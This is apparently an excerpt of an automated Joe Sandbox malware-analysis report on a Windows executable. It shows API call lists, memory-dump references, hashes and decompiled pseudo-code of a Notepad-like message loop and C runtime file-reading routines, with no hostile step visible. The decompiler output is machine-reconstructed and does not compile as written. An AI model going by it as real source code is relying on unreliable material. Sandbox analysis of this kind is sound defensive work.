                                                  • ShowWindow.USER32(?,?,?,?,?,?,?,?), ref: 010A2A4D
                                                  • UpdateWindow.USER32 ref: 010A2A59
                                                  • DragAcceptFiles.SHELL32(00000001), ref: 010A2A67
                                                  • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?), ref: 010A2A6D
                                                  • LoadAcceleratorsW.USER32 ref: 010A2A79
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2A94
                                                  • IsDialogMessageW.USER32 ref: 010A2ABB
                                                  • TranslateAcceleratorW.USER32(?,?), ref: 010A2AD4
                                                  • TranslateMessage.USER32(?), ref: 010A2AE3
                                                  • DispatchMessageW.USER32 ref: 010A2AEA
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2AF7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Message$LoadWindow$MetricsMonitorRegisterSystemTranslate_fseek$AcceleratorAcceleratorsAcceptAllocClassCommandCursorDialogDispatchDragExitFilesFromIconImageInfoLengthLineProcessRectSendShowTextUpdateVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_memset
                                                  • String ID: ($0$Notepad$commdlg_FindReplace
                                                  • API String ID: 1672473475-3416331526
                                                  • Opcode ID: f8d20d228c65e057ec61dd4220d35292c206ccab7122985762876c5affa35050
                                                  • Instruction ID: 371b7687be9af811e0789ca4951b30671ce9d30513af48d672cbe41d9ad7ca59
                                                  • Opcode Fuzzy Hash: f8d20d228c65e057ec61dd4220d35292c206ccab7122985762876c5affa35050
                                                  • Instruction Fuzzy Hash: 2251C472544301AFE720AFE4DD89FDB7BE8FB44B40F404429F6C59A194D7B69904CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A3CF5 Relevance: 21.1, APIs: 14, Instructions: 84COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 95%
                                                  			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t28;
				signed int _t38;
				void* _t47;
				signed int _t50;
				void* _t52;
				void* _t54;

				_t48 = __edi;
				_t47 = __edx;
				E010A7F04();
				_push(0x14);
				_push(0x10befc0);
				E010A61F0(__ebx, __edi, __esi);
				_t50 = E010A80DD() & 0x0000ffff;
				E010A4843(2);
				_t54 =  *0x10a0000 - 0x5a4d; // 0x5a4d
				if(_t54 == 0) {
					_t17 =  *0x10a003c; // 0xe8
					__eflags =  *((intOrPtr*)(_t17 + 0x10a0000)) - 0x4550;
					if( *((intOrPtr*)(_t17 + 0x10a0000)) != 0x4550) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t17 + 0x10a0018)) - 0x10b;
						if( *((intOrPtr*)(_t17 + 0x10a0018)) != 0x10b) {
							goto L2;
						} else {
							_t38 = 0;
							__eflags =  *((intOrPtr*)(_t17 + 0x10a0074)) - 0xe;
							if( *((intOrPtr*)(_t17 + 0x10a0074)) > 0xe) {
								__eflags =  *(_t17 + 0x10a00e8);
								_t6 =  *(_t17 + 0x10a00e8) != 0;
								__eflags = _t6;
								_t38 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t38 = 0;
				}
				 *(_t52 - 0x1c) = _t38;
				if(E010A7BCC() == 0) {
					E010A3E89(_t38, _t47, _t48, _t50, 0x1c);
				}
				if(E010A7B33(_t38, _t48) == 0) {
					_t19 = E010A3E89(_t38, _t47, _t48, _t50, 0x10);
				}
				E010A7F9E(_t19);
				 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
				E010A7347();
				 *0x10c3f18 = GetCommandLineA(); // executed
				_t23 = E010A7FDE(); // executed
				 *0x10c2120 = _t23;
				_t24 = E010A7BF6();
				_t57 = _t24;
				if(_t24 < 0) {
					E010A44DD(_t38, _t47, _t48, _t50, _t57, 8);
				}
				_t25 = E010A7E23(_t38, _t47);
				_t58 = _t25;
				if(_t25 < 0) {
					E010A44DD(_t38, _t47, _t48, _t50, _t58, 9);
				}
				_t26 = E010A4517(_t48, _t50, 1);
				_t59 = _t26;
				if(_t26 != 0) {
					E010A44DD(_t38, _t47, _t48, _t50, _t59, _t26);
				}
				_t28 = E010A28A0(_t47, _t59, 0x10a0000, 0, E010A8183(), _t50); // executed
				_t51 = _t28;
				 *((intOrPtr*)(_t52 - 0x24)) = _t28;
				if(_t38 == 0) {
					E010A47CD(_t51);
				}
				E010A4508();
				 *(_t52 - 4) = 0xfffffffe;
				return E010A6235(_t51);
			}














                                                  0x010a3cf5
                                                  0x010a3cf5
                                                  0x010a3cf5
                                                  0x010a3cff
                                                  0x010a3d01
                                                  0x010a3d06
                                                  0x010a3d10
                                                  0x010a3d15
                                                  0x010a3d20
                                                  0x010a3d27
                                                  0x010a3d2d
                                                  0x010a3d32
                                                  0x010a3d3c
                                                  0x00000000
                                                  0x010a3d3e
                                                  0x010a3d43
                                                  0x010a3d4a
                                                  0x00000000
                                                  0x010a3d4c
                                                  0x010a3d4c
                                                  0x010a3d4e
                                                  0x010a3d55
                                                  0x010a3d57
                                                  0x010a3d5d
                                                  0x010a3d5d
                                                  0x010a3d5d
                                                  0x010a3d5d
                                                  0x010a3d55
                                                  0x010a3d4a
                                                  0x010a3d29
                                                  0x010a3d29
                                                  0x010a3d29
                                                  0x010a3d29
                                                  0x010a3d60
                                                  0x010a3d6a
                                                  0x010a3d6e
                                                  0x010a3d73
                                                  0x010a3d7b
                                                  0x010a3d7f
                                                  0x010a3d84
                                                  0x010a3d85
                                                  0x010a3d8a
                                                  0x010a3d8e
                                                  0x010a3d99
                                                  0x010a3d9e
                                                  0x010a3da3
                                                  0x010a3da8
                                                  0x010a3dad
                                                  0x010a3daf
                                                  0x010a3db3
                                                  0x010a3db8
                                                  0x010a3db9
                                                  0x010a3dbe
                                                  0x010a3dc0
                                                  0x010a3dc4
                                                  0x010a3dc9
                                                  0x010a3dcc
                                                  0x010a3dd2
                                                  0x010a3dd4
                                                  0x010a3dd7
                                                  0x010a3ddc
                                                  0x010a3deb
                                                  0x010a3df0
                                                  0x010a3df2
                                                  0x010a3df7
                                                  0x010a3dfa
                                                  0x010a3dfa
                                                  0x010a3dff
                                                  0x010a3e34
                                                  0x010a3e42

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                                  • String ID:
                                                  • API String ID: 505799540-0
                                                  • Opcode ID: 4fccd157fe94d333a7eaf6cf35a1c31cb0a613b4942d5e277b8e572f4a5275fb
                                                  • Instruction ID: bb0d11083d0c81fca1b6b01f832cb33cfc5d6ab3b3a98d697324626250d2dd96
                                                  • Opcode Fuzzy Hash: 4fccd157fe94d333a7eaf6cf35a1c31cb0a613b4942d5e277b8e572f4a5275fb
                                                  • Instruction Fuzzy Hash: E321D374A4030BDADB607BF4B845FEE3194BF20705FD4816AF6C49E0C6EFB689408691
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A35B7 Relevance: 7.7, APIs: 5, Instructions: 162COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 94 10a35b7-10a35d0 95 10a35ed 94->95 96 10a35d2-10a35d7 94->96 97 10a35ef-10a35f3 95->97 96->95 98 10a35d9-10a35db 96->98 99 10a35dd-10a35e2 call 10a6117 98->99 100 10a35f4-10a35f9 98->100 108 10a35e8 call 10a4035 99->108 101 10a35fb-10a3605 100->101 102 10a3607-10a360b 100->102 101->102 104 10a362b-10a363a 101->104 105 10a361b-10a361d 102->105 106 10a360d-10a3618 call 10a66e0 102->106 111 10a363c-10a363f 104->111 112 10a3641 104->112 105->99 110 10a361f-10a3629 105->110 106->105 108->95 110->99 110->104 115 10a3646-10a364b 111->115 112->115 116 10a3651-10a3658 115->116 117 10a3734-10a3737 115->117 118 10a365a-10a3662 116->118 119 10a3699-10a369b 116->119 117->97 118->119 120 10a3664 118->120 121 10a369d-10a369f 119->121 122 10a3705-10a3706 call 10a6582 119->122 123 10a366a-10a366c 120->123 124 10a3762 120->124 125 10a36c3-10a36ce 121->125 126 10a36a1-10a36a9 121->126 135 10a370b-10a370f 122->135 130 10a366e-10a3670 123->130 131 10a3673-10a3678 123->131 132 10a3766-10a376f 124->132 128 10a36d2-10a36d5 125->128 129 10a36d0 125->129 133 10a36ab-10a36b7 126->133 134 10a36b9-10a36bd 126->134 136 10a373c-10a3740 128->136 137 10a36d7-10a36e3 call 10a66b0 call 10a6885 128->137 129->128 130->131 131->136 138 10a367e-10a3697 call 10a40b0 131->138 132->97 139 10a36bf-10a36c1 133->139 134->139 135->132 140 10a3711-10a3716 135->140 141 10a3752-10a375d call 10a6117 136->141 142 10a3742-10a374f call 10a66e0 136->142 155 10a36e8-10a36ed 137->155 154 10a36fa-10a3703 138->154 139->128 140->136 145 10a3718-10a3729 140->145 141->108 142->141 150 10a372c-10a372e 145->150 150->116 150->117 154->150 156 10a36f3-10a36f6 155->156 157 10a3774-10a3778 155->157 156->124 158 10a36f8 156->158 157->132 158->154
                                                  C-Code - Quality: 69%
                                                  			E010A35B7(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E010A66E0(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E010A6582(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E010A66E0(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E010A6117())) = 0x22;
												L4:
												E010A4035();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v8 = _t110 + 1;
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E010A66B0(_t119)); // executed
											_t88 = E010A6885(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E010A40B0(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t120 = _t120 + 0x10;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E010A6117())) = 0x16;
				goto L4;
			}




























                                                  0x010a35c1
                                                  0x010a35c4
                                                  0x010a35ca
                                                  0x010a35cd
                                                  0x010a35d0
                                                  0x010a35ed
                                                  0x00000000
                                                  0x010a35ed
                                                  0x010a35d2
                                                  0x010a35d7
                                                  0x00000000
                                                  0x00000000
                                                  0x010a35db
                                                  0x010a35f4
                                                  0x010a35f7
                                                  0x010a35f9
                                                  0x010a3607
                                                  0x010a3607
                                                  0x010a360b
                                                  0x010a3613
                                                  0x010a3618
                                                  0x010a3618
                                                  0x010a361b
                                                  0x010a361d
                                                  0x00000000
                                                  0x010a361f
                                                  0x010a361f
                                                  0x010a3627
                                                  0x010a3629
                                                  0x00000000
                                                  0x00000000
                                                  0x010a362b
                                                  0x010a362e
                                                  0x010a3631
                                                  0x010a3638
                                                  0x010a363a
                                                  0x010a3641
                                                  0x010a363c
                                                  0x010a363c
                                                  0x010a363c
                                                  0x010a3646
                                                  0x010a3649
                                                  0x010a364b
                                                  0x010a3734
                                                  0x00000000
                                                  0x010a3651
                                                  0x010a3651
                                                  0x010a3651
                                                  0x010a3658
                                                  0x010a3699
                                                  0x010a3699
                                                  0x010a369b
                                                  0x010a3706
                                                  0x010a370c
                                                  0x010a370f
                                                  0x010a3766
                                                  0x00000000
                                                  0x010a376c
                                                  0x010a3711
                                                  0x010a3714
                                                  0x010a3716
                                                  0x010a373c
                                                  0x010a373c
                                                  0x010a3740
                                                  0x010a374a
                                                  0x010a374f
                                                  0x010a3757
                                                  0x010a35e8
                                                  0x010a35e8
                                                  0x00000000
                                                  0x010a35e8
                                                  0x010a3718
                                                  0x010a371b
                                                  0x010a371e
                                                  0x010a371f
                                                  0x010a371f
                                                  0x010a3720
                                                  0x010a3723
                                                  0x010a3726
                                                  0x010a3729
                                                  0x00000000
                                                  0x010a3729
                                                  0x010a369d
                                                  0x010a369f
                                                  0x010a36c3
                                                  0x010a36c8
                                                  0x010a36ce
                                                  0x010a36d0
                                                  0x010a36d0
                                                  0x010a36a1
                                                  0x010a36a3
                                                  0x010a36a9
                                                  0x010a36bb
                                                  0x010a36bb
                                                  0x010a36bb
                                                  0x010a36bd
                                                  0x010a36ab
                                                  0x010a36b0
                                                  0x010a36b2
                                                  0x010a36b2
                                                  0x010a36bf
                                                  0x010a36bf
                                                  0x010a36d2
                                                  0x010a36d5
                                                  0x00000000
                                                  0x010a36d7
                                                  0x010a36d7
                                                  0x010a36d8
                                                  0x010a36e2
                                                  0x010a36e3
                                                  0x010a36e8
                                                  0x010a36eb
                                                  0x010a36ed
                                                  0x010a3774
                                                  0x00000000
                                                  0x010a3774
                                                  0x010a36f3
                                                  0x010a36f6
                                                  0x010a3762
                                                  0x010a3762
                                                  0x010a3762
                                                  0x010a3762
                                                  0x00000000
                                                  0x010a3762
                                                  0x010a36f8
                                                  0x010a36f8
                                                  0x010a36fa
                                                  0x010a36fa
                                                  0x010a36fd
                                                  0x010a3700
                                                  0x00000000
                                                  0x010a3700
                                                  0x010a36d5
                                                  0x010a365a
                                                  0x010a365d
                                                  0x010a3660
                                                  0x010a3662
                                                  0x00000000
                                                  0x00000000
                                                  0x010a3664
                                                  0x00000000
                                                  0x00000000
                                                  0x010a366a
                                                  0x010a366c
                                                  0x010a366e
                                                  0x010a3670
                                                  0x010a3670
                                                  0x010a3673
                                                  0x010a3676
                                                  0x010a3678
                                                  0x00000000
                                                  0x010a367e
                                                  0x010a3685
                                                  0x010a368a
                                                  0x010a368d
                                                  0x010a3690
                                                  0x010a3693
                                                  0x010a3695
                                                  0x00000000
                                                  0x010a3695
                                                  0x010a372c
                                                  0x010a372c
                                                  0x010a372c
                                                  0x00000000
                                                  0x010a3651
                                                  0x010a364b
                                                  0x010a361d
                                                  0x010a3600
                                                  0x010a3603
                                                  0x010a3605
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a3605
                                                  0x010a35dd
                                                  0x010a35e2
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: 4d6326407d16fd6ecb703112db2abd710cec160eff3c598c81bf8f1d6820594c
                                                  • Instruction ID: 03de53f831ed53d6c2f9db541f6c2260e8aa66c704e26a0ef70c28460fee21c8
                                                  • Opcode Fuzzy Hash: 4d6326407d16fd6ecb703112db2abd710cec160eff3c598c81bf8f1d6820594c
                                                  • Instruction Fuzzy Hash: 5751B470A007069BDB648FFDC8846AE7FF1BF14360F948769E9A59E2D0D771D9508B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010ADD2E Relevance: 4.5, APIs: 3, Instructions: 32COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 159 10add2e-10add46 call 10a42de 162 10add48-10add4c 159->162 163 10add4d-10add63 call 10b30f1 159->163 165 10add68-10add79 call 10a8c4b 163->165
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ___copy_path_to_wide_string__wsopen_nolock_free
                                                  • String ID:
                                                  • API String ID: 1272159912-0
                                                  • Opcode ID: c7a9c380249c97d1de4214cd3054ea736285430e00f9b7ef0eded777385428fa
                                                  • Instruction ID: abfa8125e4be7da5abc2296f67b1d263cecdcb8eb55dfc7bd021acb23cca5fe5
                                                  • Opcode Fuzzy Hash: c7a9c380249c97d1de4214cd3054ea736285430e00f9b7ef0eded777385428fa
                                                  • Instruction Fuzzy Hash: 85F01C3691011AFBDF169FD4DD019DE7BAAEF082A8F504151F910A50A0E776CA60AB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A3795 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 168 10a3795-10a37a9 call 10a61f0 171 10a37ab-10a37ae 168->171 172 10a37dc 168->172 171->172 174 10a37b0-10a37b5 171->174 173 10a37de-10a37e3 call 10a6235 172->173 176 10a37b7-10a37bb 174->176 177 10a37e4-10a37fb call 10a4bf4 call 10a35b7 174->177 180 10a37cc-10a37d7 call 10a6117 call 10a4035 176->180 181 10a37bd-10a37c9 call 10a66e0 176->181 189 10a3800-10a3816 call 10a381e 177->189 180->172 181->180 189->173
                                                  C-Code - Quality: 89%
                                                  			E010A3795(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0x10bef60);
				E010A61F0(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E010A4BF4(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E010A35B7( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E010A381E(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E010A66E0( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E010A6117())) = 0x16;
						E010A4035();
						goto L6;
					}
				}
				return E010A6235(_t16);
			}







                                                  0x010a3795
                                                  0x010a3797
                                                  0x010a379c
                                                  0x010a37a3
                                                  0x010a37a9
                                                  0x010a37dc
                                                  0x010a37dc
                                                  0x010a37b0
                                                  0x010a37b0
                                                  0x010a37b5
                                                  0x010a37e5
                                                  0x010a37eb
                                                  0x010a37fb
                                                  0x010a3803
                                                  0x010a3805
                                                  0x010a3808
                                                  0x010a380f
                                                  0x010a3814
                                                  0x010a37b7
                                                  0x010a37bb
                                                  0x010a37c4
                                                  0x010a37c9
                                                  0x010a37d1
                                                  0x010a37d7
                                                  0x00000000
                                                  0x010a37d7
                                                  0x010a37b5
                                                  0x010a37e3

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __lock_file_memset
                                                  • String ID:
                                                  • API String ID: 26237723-0
                                                  • Opcode ID: dea218494c5c7883b4129b0ab64134ba89a04883f21013c3feb5ee6d06c9c466
                                                  • Instruction ID: 40c8b5c6c8b175dfa9b1f6a3c93c779789ca0ea845ccee8643c0e8df9a39a2dd
                                                  • Opcode Fuzzy Hash: dea218494c5c7883b4129b0ab64134ba89a04883f21013c3feb5ee6d06c9c466
                                                  • Instruction Fuzzy Hash: D301447590020AABCF22AFE98C049DE7FB1BF50360F988255F9A85E150D772C611DF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A3B7F Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 84%
                                                  			E010A3B7F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				signed int _t14;
				signed int _t23;
				void* _t26;

				_push(0xc);
				_push(0x10bef80);
				E010A61F0(__ebx, __edi, __esi);
				_t25 =  *((intOrPtr*)(_t26 + 8));
				if((0 |  *((intOrPtr*)(_t26 + 8)) != 0x00000000) != 0) {
					E010A4BF4(_t25);
					 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
					_t12 = E010A3826(__edx, __edi, _t25, _t25); // executed
					_t23 = _t12;
					 *(_t26 - 0x1c) = _t23;
					 *(_t26 - 4) = 0xfffffffe;
					E010A3BDF(_t25);
					_t14 = _t23;
				} else {
					 *((intOrPtr*)(E010A6117())) = 0x16;
					_t14 = E010A4035() | 0xffffffff;
				}
				return E010A6235(_t14);
			}







                                                  0x010a3b7f
                                                  0x010a3b81
                                                  0x010a3b86
                                                  0x010a3b8d
                                                  0x010a3b97
                                                  0x010a3baf
                                                  0x010a3bb5
                                                  0x010a3bba
                                                  0x010a3bc0
                                                  0x010a3bc2
                                                  0x010a3bc5
                                                  0x010a3bcc
                                                  0x010a3bd1
                                                  0x010a3b99
                                                  0x010a3b9e
                                                  0x010a3ba9
                                                  0x010a3ba9
                                                  0x010a3bd8

                                                  APIs
                                                  • __lock_file.LIBCMT ref: 010A3BAF
                                                  • __ftell_nolock.LIBCMT ref: 010A3BBA
                                                    • Part of subcall function 010A6117: __getptd_noexit.LIBCMT ref: 010A6117
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2999321469-0
                                                  • Opcode ID: 07376c561abbfaf124d1d81cb0169a2ad470452f82e7ee4c556fb1ec5fd170ce
                                                  • Instruction ID: d637f7f4f60539a48ded8785235205b64901df0bafa6b43fa427d41406e5476d
                                                  • Opcode Fuzzy Hash: 07376c561abbfaf124d1d81cb0169a2ad470452f82e7ee4c556fb1ec5fd170ce
